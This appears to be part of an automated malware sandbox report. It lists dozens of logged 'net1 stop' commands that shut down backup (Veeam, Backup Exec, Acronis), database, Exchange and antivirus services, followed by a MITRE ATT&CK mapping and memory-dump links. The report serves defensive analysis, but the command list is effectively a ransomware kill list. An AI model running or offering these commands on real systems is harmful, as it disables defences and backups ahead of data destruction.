C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:11328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:11224

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:11208

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:11296

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:8644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:11256

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:11352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:11248

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:4644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:4900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:11304

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:10128

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:11200

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:11076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:9196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:11400

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:10152

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:10104

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:8312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:14332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:14324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:14316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:14292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:14284

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:14276

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooIT /y
1⤵
PID:14268

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:14260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:14252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:14244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:14236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:14228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:14220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:14212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:14204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:14196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:14188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:14180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:14172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:14164

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:14156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:14148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:14140

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:14132

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:14124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:14116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:14108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:14100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:14092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:14084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:14076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:14068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:14044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:14036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:14028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:14020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:14012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:14004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:13972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:13932

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:13924

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:13916

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:13168

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:5308

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:14420

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:12732

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/296-932-0x000001FB43938000-0x000001FB43939000-memory.dmp

Filesize
4KB

Download
memory/296-285-0x000001FB43930000-0x000001FB43932000-memory.dmp

Filesize
8KB

Download
memory/296-288-0x000001FB43933000-0x000001FB43935000-memory.dmp

Filesize
8KB

Download
memory/296-600-0x000001FB43936000-0x000001FB43938000-memory.dmp

Filesize
8KB

Download
memory/400-186-0x0000028690F50000-0x0000028690F52000-memory.dmp

Filesize
8KB

Download
memory/400-187-0x0000028690F50000-0x0000028690F52000-memory.dmp

Filesize
8KB

Download
memory/400-198-0x0000028691153000-0x0000028691155000-memory.dmp

Filesize
8KB

Download
memory/400-938-0x0000028691158000-0x0000028691159000-memory.dmp

Filesize
4KB

Download
memory/400-184-0x0000028690F50000-0x0000028690F52000-memory.dmp

Filesize
8KB

Download
memory/400-524-0x0000028691156000-0x0000028691158000-memory.dmp

Filesize
8KB

Download
memory/400-194-0x0000028690F50000-0x0000028690F52000-memory.dmp

Filesize
8KB

Download
memory/400-197-0x0000028691150000-0x0000028691152000-memory.dmp

Filesize
8KB

Download
memory/604-391-0x00000273D5066000-0x00000273D5068000-memory.dmp

Filesize
8KB

Download
memory/604-167-0x00000273BC860000-0x00000273BC862000-memory.dmp

Filesize
8KB

Download
memory/604-936-0x00000273D5068000-0x00000273D5069000-memory.dmp

Filesize
4KB

Download
memory/604-174-0x00000273BC860000-0x00000273BC862000-memory.dmp

Filesize
8KB

Download
memory/604-172-0x00000273BC860000-0x00000273BC862000-memory.dmp

Filesize
8KB

Download
memory/604-199-0x00000273D5060000-0x00000273D5062000-memory.dmp

Filesize
8KB

Download
memory/604-165-0x00000273BC860000-0x00000273BC862000-memory.dmp

Filesize
8KB

Download
memory/604-211-0x00000273D5063000-0x00000273D5065000-memory.dmp

Filesize
8KB

Download
memory/604-170-0x00000273BC860000-0x00000273BC862000-memory.dmp

Filesize
8KB

Download
memory/824-249-0x0000024FFE603000-0x0000024FFE605000-memory.dmp

Filesize
8KB

Download
memory/824-934-0x0000024FFE608000-0x0000024FFE609000-memory.dmp

Filesize
4KB

Download
memory/824-245-0x0000024FFE600000-0x0000024FFE602000-memory.dmp

Filesize
8KB

Download
memory/824-596-0x0000024FFE606000-0x0000024FFE608000-memory.dmp

Filesize
8KB

Download
memory/836-241-0x000002580D140000-0x000002580D142000-memory.dmp

Filesize
8KB

Download
memory/836-243-0x000002580D143000-0x000002580D145000-memory.dmp

Filesize
8KB

Download
memory/836-943-0x000002580D148000-0x000002580D149000-memory.dmp

Filesize
4KB

Download
memory/836-563-0x000002580D146000-0x000002580D148000-memory.dmp

Filesize
8KB

Download
memory/1060-119-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-118-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-120-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-121-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-122-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-155-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-123-0x0000027C78720000-0x0000027C78721000-memory.dmp

Filesize
4KB

Download
memory/1060-124-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-125-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-126-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-127-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-128-0x0000027C7AE60000-0x0000027C7AE61000-memory.dmp

Filesize
4KB

Download
memory/1060-131-0x0000027C76B90000-0x0000027C76B92000-memory.dmp

Filesize
8KB

Download
memory/1060-130-0x0000027C786E0000-0x0000027C786E2000-memory.dmp

Filesize
8KB

Download
memory/1060-132-0x0000027C786E3000-0x0000027C786E5000-memory.dmp

Filesize
8KB

Download
memory/1060-154-0x0000027C786E6000-0x0000027C786E8000-memory.dmp

Filesize
8KB

Download
memory/1088-192-0x0000023963303000-0x0000023963305000-memory.dmp

Filesize
8KB

Download
memory/1088-931-0x0000023963308000-0x0000023963309000-memory.dmp

Filesize
4KB

Download
memory/1088-189-0x0000023963300000-0x0000023963302000-memory.dmp

Filesize
8KB

Download
memory/1088-162-0x000002394AB40000-0x000002394AB42000-memory.dmp

Filesize
8KB

Download
memory/1088-163-0x000002394AB40000-0x000002394AB42000-memory.dmp

Filesize
8KB

Download
memory/1088-160-0x000002394AB40000-0x000002394AB42000-memory.dmp

Filesize
8KB

Download
memory/1088-164-0x000002394AB40000-0x000002394AB42000-memory.dmp

Filesize
8KB

Download
memory/1088-166-0x000002394AB40000-0x000002394AB42000-memory.dmp

Filesize
8KB

Download
memory/1088-351-0x0000023963306000-0x0000023963308000-memory.dmp

Filesize
8KB

Download
memory/1472-188-0x0000025DF69C0000-0x0000025DF69C2000-memory.dmp

Filesize
8KB

Download
memory/1472-204-0x0000025DF8A70000-0x0000025DF8A72000-memory.dmp

Filesize
8KB

Download
memory/1472-207-0x0000025DF8A73000-0x0000025DF8A75000-memory.dmp

Filesize
8KB

Download
memory/1472-557-0x0000025DF8A76000-0x0000025DF8A78000-memory.dmp

Filesize
8KB

Download
memory/1472-191-0x0000025DF69C0000-0x0000025DF69C2000-memory.dmp

Filesize
8KB

Download
memory/1472-195-0x0000025DF69C0000-0x0000025DF69C2000-memory.dmp

Filesize
8KB

Download
memory/1472-948-0x0000025DF8A78000-0x0000025DF8A79000-memory.dmp

Filesize
4KB

Download
memory/1660-944-0x000002A2FC078000-0x000002A2FC079000-memory.dmp

Filesize
4KB

Download
memory/1660-223-0x000002A2FC070000-0x000002A2FC072000-memory.dmp

Filesize
8KB

Download
memory/1660-227-0x000002A2FC073000-0x000002A2FC075000-memory.dmp

Filesize
8KB

Download
memory/1660-561-0x000002A2FC076000-0x000002A2FC078000-memory.dmp

Filesize
8KB

Download
memory/2040-180-0x0000021356B40000-0x0000021356B42000-memory.dmp

Filesize
8KB

Download
memory/2040-177-0x0000021356B40000-0x0000021356B42000-memory.dmp

Filesize
8KB

Download
memory/2040-231-0x0000021370BA0000-0x0000021370BA2000-memory.dmp

Filesize
8KB

Download
memory/2040-176-0x0000021356B40000-0x0000021356B42000-memory.dmp

Filesize
8KB

Download
memory/2040-235-0x0000021370BA3000-0x0000021370BA5000-memory.dmp

Filesize
8KB

Download
memory/2040-946-0x0000021370BA8000-0x0000021370BA9000-memory.dmp

Filesize
4KB

Download
memory/2040-485-0x0000021370BA6000-0x0000021370BA8000-memory.dmp

Filesize
8KB

Download
memory/2040-183-0x0000021356B40000-0x0000021356B42000-memory.dmp

Filesize
8KB

Download
memory/2040-182-0x0000021356B40000-0x0000021356B42000-memory.dmp

Filesize
8KB

Download
memory/3292-605-0x00000213FD3E6000-0x00000213FD3E8000-memory.dmp

Filesize
8KB

Download
memory/3292-284-0x00000213FD3E3000-0x00000213FD3E5000-memory.dmp

Filesize
8KB

Download
memory/3292-951-0x00000213FD3E8000-0x00000213FD3E9000-memory.dmp

Filesize
4KB

Download
memory/3292-281-0x00000213FD3E0000-0x00000213FD3E2000-memory.dmp

Filesize
8KB

Download
memory/3572-173-0x0000022F16090000-0x0000022F16092000-memory.dmp

Filesize
8KB

Download
memory/3572-171-0x0000022F16090000-0x0000022F16092000-memory.dmp

Filesize
8KB

Download
memory/3572-214-0x0000022F16180000-0x0000022F16182000-memory.dmp

Filesize
8KB

Download
memory/3572-169-0x0000022F16090000-0x0000022F16092000-memory.dmp

Filesize
8KB

Download
memory/3572-940-0x0000022F16188000-0x0000022F16189000-memory.dmp

Filesize
4KB

Download
memory/3572-178-0x0000022F16090000-0x0000022F16092000-memory.dmp

Filesize
8KB

Download
memory/3572-179-0x0000022F16090000-0x0000022F16092000-memory.dmp

Filesize
8KB

Download
memory/3572-426-0x0000022F16186000-0x0000022F16188000-memory.dmp

Filesize
8KB

Download
memory/3572-228-0x0000022F16183000-0x0000022F16185000-memory.dmp

Filesize
8KB

Download
memory/3736-115-0x0000000000320000-0x0000000000321000-memory.dmp

Filesize
4KB

Download
memory/3736-129-0x000000001B470000-0x000000001B472000-memory.dmp

Filesize
8KB

Download
memory/3760-1205-0x000001DE69ED8000-0x000001DE69ED9000-memory.dmp

Filesize
4KB

Download
memory/3760-609-0x000001DE69ED6000-0x000001DE69ED8000-memory.dmp

Filesize
8KB

Download
memory/3760-383-0x000001DE69ED0000-0x000001DE69ED2000-memory.dmp

Filesize
8KB

Download
memory/3760-387-0x000001DE69ED3000-0x000001DE69ED5000-memory.dmp

Filesize
8KB

Download
memory/4084-930-0x00000201393B8000-0x00000201393B9000-memory.dmp

Filesize
4KB

Download
memory/4084-216-0x00000201393B0000-0x00000201393B2000-memory.dmp

Filesize
8KB

Download
memory/4084-219-0x00000201393B3000-0x00000201393B5000-memory.dmp

Filesize
8KB

Download
memory/4084-356-0x00000201393B6000-0x00000201393B8000-memory.dmp

Filesize
8KB

Download
memory/8480-469-0x000001ACEF093000-0x000001ACEF095000-memory.dmp

Filesize
8KB

Download
memory/8480-467-0x000001ACEF090000-0x000001ACEF092000-memory.dmp

Filesize
8KB

Download
memory/8480-732-0x000001ACEF096000-0x000001ACEF098000-memory.dmp

Filesize
8KB

Download